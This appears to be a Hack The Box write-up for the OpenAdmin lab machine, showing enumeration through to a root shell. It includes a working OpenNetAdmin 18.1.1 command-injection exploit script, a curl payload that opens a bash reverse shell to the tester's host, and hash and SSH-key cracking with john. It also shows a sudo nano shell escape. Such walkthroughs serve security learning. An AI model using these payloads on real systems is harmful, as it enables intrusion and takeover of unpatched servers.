OpenAdmin is an easy Linux box released back in january 2020.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.0.14.13/16 ] [ /dev/pts/1 ] [~/HTB]
→ nmap -sCV 10.10.10.171
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 21:20 CEST
Nmap scan report for 10.10.10.171
Host is up (0.039s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
For this box we're going to enumerate port 80 using a directory enumeration tool written in go called ffuf with one of the wordlists from seclists:
[ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/OpenAdmin]
→ apt install seclists ffuf
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive
________________________________________________
:: Method : GET
:: URL : http://10.10.10.171/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Output file : ffuf.txt
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401
________________________________________________
artwork [Status: 301, Size: 314, Words: 20, Lines: 10]
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
music [Status: 301, Size: 312, Words: 20, Lines: 10]
:: Progress: [4681/4681] :: Job [1/1] :: 978 req/sec :: Duration: [0:00:07] :: Errors: 0 ::
Now from here we can scrape the results that got outputted in ffuf.txt using a python script:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ cat ffuf.txt
{"commandline":"ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt","time":"2021-05-27T07:01:23+02:00","results":[{"input":{"FUZZ":"artwork"},"position":695,"status":301,"length":314,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://10.10.10.171/artwork/","resultfile":"","url":"http://10.10.10.171/artwork","host":"10.10.10.171"},{"input":{"FUZZ":"index.html"},"position":2176,"status":200,"length":10918,"words":3499,"lines":376,"content-type":"text/html","redirectlocation":"","resultfile":"","url":"http://10.10.10.171/index.html","host":"10.10.10.171"},{"input":{"FUZZ":"music"},"position":2747,"status":301,"length":312,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://10.10.10.171/music/","resultfile":"","url":"http://10.10.10.171/music","host":"10.10.10.171"}],"config":{"autocalibration":false,"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt","configfile":"","postdata":"","delay":{"value":"0.00"},"dirsearch_compatibility":false,"extensions":[],"filters":{},"follow_redirects":false,"headers":{},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"clusterbomb","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"FUZZ","value":"/usr/share/seclists/Discovery/Web-Content/common.txt"}],"inputshell":"","matchers":{"status":{"value":"200,204,301,302,307,401"}},"maxtime":0,"maxtime_job":0,"method":"GET","noninteractive":false,"outputdirectory":"","outputfile":"ffuf.txt","outputformat":"json","OutputCreateEmptyFile":false,"proxyurl":"","quiet":false,"rate":0,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://10.10.10.171/FUZZ","verbose":false}}%
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ vim scraper.py
#!/usr/bin/python
import sys
import json
import requests
import argparse
from bs4 import BeautifulSoup
def results(file):
content=open(file,'r').readlines()
for line in content:
data=json.loads(line.strip())
urls=[]
for url in data['results']:
urls.append(url['url'])
return urls
def crawl(url):
r = requests.get(url)
soup = BeautifulSoup(r.text,'lxml')
links = soup.findAll('a',href=True)
for link in links:
link=link['href']
if link and link!='#':
print('[+] {} : {} '.format(url,link))
if __name__ == '__main__' :
parser =argparse.ArgumentParser()
parser.add_argument("file",help="ffuf results")
args = parser.parse_args()
urls=results(args.file)
for url in urls:
crawl(url)
Now execute it and see the result:
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ python3 scraper.py
usage: scraper.py [-h] file
scraper.py: error: the following arguments are required: file
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ python3 scraper.py ffuf.txt
[+] http://10.10.10.171/artwork : index.html
[+] http://10.10.10.171/artwork : index.html
[+] http://10.10.10.171/artwork : about.html
[+] http://10.10.10.171/artwork : services.html
[+] http://10.10.10.171/artwork : blog.html
[+] http://10.10.10.171/artwork : contact.html
[+] http://10.10.10.171/artwork : single.html
[+] http://10.10.10.171/artwork : single.html
[+] http://10.10.10.171/artwork : single.html
[+] http://10.10.10.171/artwork : single.html
[+] http://10.10.10.171/artwork : single.html
[+] http://10.10.10.171/artwork : single.html
[+] http://10.10.10.171/artwork : index.html
[+] http://10.10.10.171/artwork : https://colorlib.com
[+] http://10.10.10.171/index.html : /manual
[+] http://10.10.10.171/index.html : http://httpd.apache.org/docs/2.4/mod/mod_userdir.html
[+] http://10.10.10.171/index.html : https://bugs.launchpad.net/ubuntu/+source/apache2
[+] http://10.10.10.171/music : index.html
[+] http://10.10.10.171/music : ../ona
[+] http://10.10.10.171/music : index.html
[+] http://10.10.10.171/music : category.html
[+] http://10.10.10.171/music : playlist.html
[+] http://10.10.10.171/music : artist.html
[+] http://10.10.10.171/music : blog.html
[+] http://10.10.10.171/music : contact.html
[+] http://10.10.10.171/music : blog.html
[+] http://10.10.10.171/music : contact.html
[+] http://10.10.10.171/music : https://colorlib.com
And so with this we find the ../ona path
ona in this case refers to OpenNetAdmin, and we know that it is version 18.1.1, so let's see if there are any CVEs for this service:
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ searchsploit opennetadmin
------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------ ---------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)| php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh
------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
And here you see that we have a few exploits to work with. We're going to take a look at the RCE one:
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ cp $(locate 47691.sh) .
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ ls
47691.sh ffuf.txt scraper.py
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ vim 47691.sh
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
Very simplistic exploit, it just needs the URL of the ona instance of the machine:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ dos2unix 47691.sh
dos2unix: converting file 47691.sh to Unix format...
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ ./47691.sh http://10.10.10.171/ona/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -lash
total 72K
4.0K drwxrwxr-x 10 www-data www-data 4.0K Nov 22 2019 .
4.0K drwxr-x--- 7 www-data www-data 4.0K Nov 21 2019 ..
4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 .htaccess.example
4.0K drwxrwxr-x 2 www-data www-data 4.0K Jan 3 2018 config
4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 config_dnld.php
8.0K -rw-rw-r-- 1 www-data www-data 4.1K Jan 3 2018 dcm.php
4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 images
4.0K drwxrwxr-x 9 www-data www-data 4.0K Jan 3 2018 include
4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 index.php
4.0K drwxrwxr-x 5 www-data www-data 4.0K Jan 3 2018 local
8.0K -rw-rw-r-- 1 www-data www-data 4.5K Jan 3 2018 login.php
4.0K -rw-rw-r-- 1 www-data www-data 1.1K Jan 3 2018 logout.php
4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 modules
4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 plugins
4.0K drwxrwxr-x 2 www-data www-data 4.0K Jan 3 2018 winc
4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 workspace_plugins
And there we have command execution as www-data! However the more we test this, the more we see that we are very limited with our shell (unable to access python3, bash and such) so let's manually push a bash shell:
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
→ curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.14.13/4443 0>%261'&xajaxargs[]=ping" http://10.10.10.171/ona/
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ nc -lvnp 4443
listening on [any] 4443 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.171] 43106
bash: cannot set terminal process group (1077): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Now let's upgrade our shell to a fully interactive TTY:
www-data@openadmin:/opt/ona/www$ which python python3
which python python3
/usr/bin/python3
www-data@openadmin:/opt/ona/www$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@openadmin:/opt/ona/www$ ^Z
[1] + 3470018 suspended nc -lvnp 4443
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ stty raw -echo ; fg
[1] + 3470018 continued nc -lvnp 4443
www-data@openadmin:/opt/ona/www$ export TERM=screen-256color
www-data@openadmin:/opt/ona/www$ export SHELL=bash
www-data@openadmin:/opt/ona/www$ stty rows 40 columns 125
www-data@openadmin:/opt/ona/www$ reset
Let's see which users we can privesc to:
www-data@openadmin:/opt/ona/www$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
www-data@openadmin:/opt/ona/www$ ls -lashR /home
/home:
total 16K
4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 .
4.0K drwxr-xr-x 24 root root 4.0K Nov 21 2019 ..
4.0K drwxr-x--- 5 jimmy jimmy 4.0K Nov 22 2019 jimmy
4.0K drwxr-x--- 6 joanna joanna 4.0K Nov 28 2019 joanna
ls: cannot open directory '/home/jimmy': Permission denied
ls: cannot open directory '/home/joanna': Permission denied
To enumerate this box automatically we can use linpeas.sh:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ locate linpeas.sh
/home/nothing/HTB/Postman/linpeas.sh
/home/nothing/HTB/Traverxec/linpeas.sh
/home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
www-data@openadmin:/opt/ona/www$ which wget curl
/usr/bin/wget
/usr/bin/curl
www-data@openadmin:/opt/ona/www$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
--2021-05-27 06:39:01-- http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: '/tmp/peas.sh'
/tmp/peas.sh 100%[====================================================>] 333.85K 695KB/s in 0.5s
2021-05-27 06:39:02 (695 KB/s) - '/tmp/peas.sh' saved [341863/341863]
www-data@openadmin:/opt/ona/www$ chmod +x /tmp/peas.sh
www-data@openadmin:/opt/ona/www$ /tmp/peas.sh
Linpeas gives alot of output, one thing that stands out is the following:
OpenNetAdmin has a database settings php file in /var/www/html/ona/local/config/database_settings.inc.php
www-data@openadmin:/opt/ona/www$ cd /var/www/html/ona/local/config
www-data@openadmin:/var/www/html/ona/local/config$ ls -lash
total 16K
4.0K drwxrwxr-x 2 www-data www-data 4.0K Nov 21 2019 .
4.0K drwxrwxr-x 5 www-data www-data 4.0K Jan 3 2018 ..
4.0K -rw-r--r-- 1 www-data www-data 426 Nov 21 2019 database_settings.inc.php
4.0K -rw-rw-r-- 1 www-data www-data 1.2K Jan 3 2018 motd.txt.example
0 -rw-r--r-- 1 www-data www-data 0 Nov 21 2019 run_installer
www-data@openadmin:/var/www/html/ona/local/config$ vim database_settings.inc.php
And here we see some hardcoded credentials:
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
?>
And as it turns out, those were jimmy's credentials!
[ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/OpenAdmin]
→ ssh jimmy@10.10.10.171
The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.171' (ECDSA) to the list of known hosts.
jimmy@10.10.10.171's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu May 27 07:04:20 UTC 2021
System load: 0.0 Processes: 121
Usage of /: 49.3% of 7.81GB Users logged in: 0
Memory usage: 29% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$ id
uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)
jimmy@openadmin:~$ ls
jimmy@openadmin:~$ ls -lash
total 32K
4.0K drwxr-x--- 5 jimmy jimmy 4.0K Nov 22 2019 .
4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 ..
0 lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 2019 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout
4.0K -rw-r--r-- 1 jimmy jimmy 3.7K Apr 4 2018 .bashrc
4.0K drwx------ 2 jimmy jimmy 4.0K Nov 21 2019 .cache
4.0K drwx------ 3 jimmy jimmy 4.0K Nov 21 2019 .gnupg
4.0K drwxrwxr-x 3 jimmy jimmy 4.0K Nov 22 2019 .local
4.0K -rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile
So now we can access the /var/www/internal directory:
jimmy@openadmin:/var/www/internal$ ls -lash
total 20K
4.0K drwxrwx--- 2 jimmy internal 4.0K Nov 23 2019 .
4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 ..
4.0K -rwxrwxr-x 1 jimmy internal 3.2K Nov 22 2019 index.php
4.0K -rwxrwxr-x 1 jimmy internal 185 Nov 23 2019 logout.php
4.0K -rwxrwxr-x 1 jimmy internal 339 Nov 23 2019 main.php
jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/
internal.conf openadmin.conf
jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/internal.conf
Listen 127.0.0.1:52846
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
AssignUserID joanna joanna
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
The /var/www/internal/ directory is being used by the apache2 site whose configuration is at /etc/apache2/sites-enabled/internal.conf And it seems to be running on the machine's localhost port 52846, No need to view the page itself because we have access to it's php sourcecode:
jimmy@openadmin:/var/www/internal$ cat index.php | grep password
.form-signin input[type="password"] {
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
$msg = 'Wrong username or password.';
So here we get a hashed password, so let's crack it with john:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ cat pass.hashed.txt
00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
Possible Hashs:
[+] SHA-512
[+] Whirlpool
Least Possible Hashs:
[+] SHA-512(HMAC)
[+] Whirlpool(HMAC)
--------------------------------------------------
We get hinted that this is a SHA512 hash, so let's crack it using john and rockyou.txt
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ john pass.hashed.txt --format=Raw-SHA512 --wordlist=/usr/share/wordlists/rockyou.txt --rules=Jumbo
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 256/256 AVX2 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Revealed (?)
1g 0:00:00:02 DONE (2021-05-27 09:06) 0.4504g/s 6963Kp/s 6963Kc/s 6963KC/s Rey428..Reesenme
Use the "--show" option to display all of the cracked passwords reliably
Session completed
And we get the password 'Revealed'! So let's create a ssh tunnel to the box to view the internal website:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
→ ssh jimmy@10.10.10.171
jimmy@10.10.10.171's password: n1nj4W4rri0R!
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu May 27 08:16:54 UTC 2021
System load: 0.0 Processes: 118
Usage of /: 49.3% of 7.81GB Users logged in: 1
Memory usage: 29% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu May 27 07:04:21 2021 from 10.10.14.13
jimmy@openadmin:~$
Here you could create a SSH tunnel to get to the internal website like so:
jimmy@openadmin:~$ ssh -R 1337:127.0.0.1:52946 root@10.10.14.13
However there's a simpler method:
jimmy@openadmin:/var/www/internal$ curl localhost:52846/main.php
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
Don't forget your "ninja" password
Click here to logout Session
And we have an encrypted ssh key! so let's crack it:
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ vim id_rsa
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ file id_rsa
id_rsa: PEM RSA private key
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ locate ssh2john
/usr/share/john/ssh2john.py
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ john id_rsa.hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:02 DONE (2021-05-27 10:16) 0.3496g/s 5014Kp/s 5014Kc/s 5014KC/sa6_123..*7¡Vamos!
Session completed
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ chmod 600 id_rsa
[ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
→ ssh joanna@10.10.10.171 -i id_rsa
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu May 27 08:24:40 UTC 2021
System load: 0.0 Processes: 123
Usage of /: 49.6% of 7.81GB Users logged in: 1
Memory usage: 29% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Jan 2 21:12:40 2020 from 10.10.14.3
joanna@openadmin:~$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
joanna@openadmin:~$ ls
user.txt
joanna@openadmin:~$ cat user.txt
c9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the user flag.
Now in order to privesc to the root user, we run linpeas again:
[ 10.10.14.13/23 ] [ /dev/pts/12 ] [~/HTB/OpenAdmin]
→ ls -lash linpeas.sh
336K -rwxr-xr-x 1 nothing nothing 334K May 27 08:13 linpeas.sh
[ 10.10.14.13/23 ] [ /dev/pts/12 ] [~/HTB/OpenAdmin]
→ python3 -m http.server 9090
joanna@openadmin:~$ wget http://10.10.14.13:9090/linpeas.sh
--2021-05-27 08:26:50-- http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[====================================================================================================================================================>] 333.85K 696KB/s in 0.5s
2021-05-27 08:26:50 (696 KB/s) - ‘linpeas.sh’ saved [341863/341863]
joanna@openadmin:~$ chmod +x linpeas.sh
joanna@openadmin:~$ ./linpeas.sh
And here we see that joanna can run nano as the root user:
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
Nano allows inserting external files into the current one using the shortcut CTRL+R, so let's do it:
joanna@openadmin:~$ sudo -u root /bin/nano /opt/priv
^R
Here we see that we can execute a command using CTRL+X, so we're going to get a shell using the following:
The shell gets a bit weird once you do it but it effectively spawns a root shell as intended:
Command to execute: reset; sh 1>&0 2>&0# id
uid=0(root) gid=0(root) groups=0(root) ^X Read File
# cat /root/root.txt M-F New Buffer
2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get a root shell and print the root flag.
Here we can see the progress graph :